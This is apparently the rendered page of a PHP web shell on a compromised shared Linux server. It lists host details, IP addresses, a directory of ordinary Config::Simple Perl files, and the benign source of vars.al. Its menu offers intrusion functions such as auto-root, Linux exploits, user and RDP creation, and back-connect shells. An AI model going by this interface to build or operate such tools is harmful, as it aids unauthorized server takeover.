Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.13
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
auto /
Config /
Simple /
[ HOME SHELL ]
Name
Size
Permission
Action
CLEAR.al
361
B
-rw-r--r--
DELETE.al
349
B
-rw-r--r--
EXISTS.al
385
B
-rw-r--r--
FETCH.al
345
B
-rw-r--r--
FIRSTKEY.al
610
B
-rw-r--r--
NEXTKEY.al
459
B
-rw-r--r--
STORE.al
345
B
-rw-r--r--
TIEHASH.al
524
B
-rw-r--r--
autosplit.ix
400
B
-rw-r--r--
block.al
348
B
-rw-r--r--
dump.al
602
B
-rw-r--r--
error.al
381
B
-rw-r--r--
errstr.al
347
B
-rw-r--r--
hashref.al
358
B
-rw-r--r--
import_from.al
885
B
-rw-r--r--
import_names.al
836
B
-rw-r--r--
param_hash.al
357
B
-rw-r--r--
vars.al
1
KB
-rw-r--r--
verbose.al
360
B
-rw-r--r--
write_string.al
436
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : vars.al
# NOTE: Derived from blib/lib/Config/Simple.pm. # Changes made here will be lost when autosplit is run again. # See AutoSplit.pm. package Config::Simple; #line 1313 "blib/lib/Config/Simple.pm (autosplit into blib/lib/auto/Config/Simple/vars.al)" # Following methods are loaded on demand. # returns all the keys as a hash or hashref sub vars { my $self = shift; # it might seem we should have used get_param() or param() # methods to make the task easier, but param() itself uses # vars(), so it will result in a deep recursion my %vars = (); my $syntax = $self->{_SYNTAX} or die "'_SYNTAX' is not defined"; if ( $syntax eq 'ini' ) { while ( my ($block, $values) = each %{$self->{_DATA}} ) { while ( my ($k, $v) = each %{$values} ) { $vars{"$block.$k"} = (@{$v} > 1) ? $v : $v->[0]; } } } else { while ( my ($k, $v) = each %{$self->{_DATA}} ) { $vars{$k} = (@{$v} > 1) ? $v : $v->[0]; } } return wantarray ? %vars : \%vars; } # end of Config::Simple::vars 1;
Close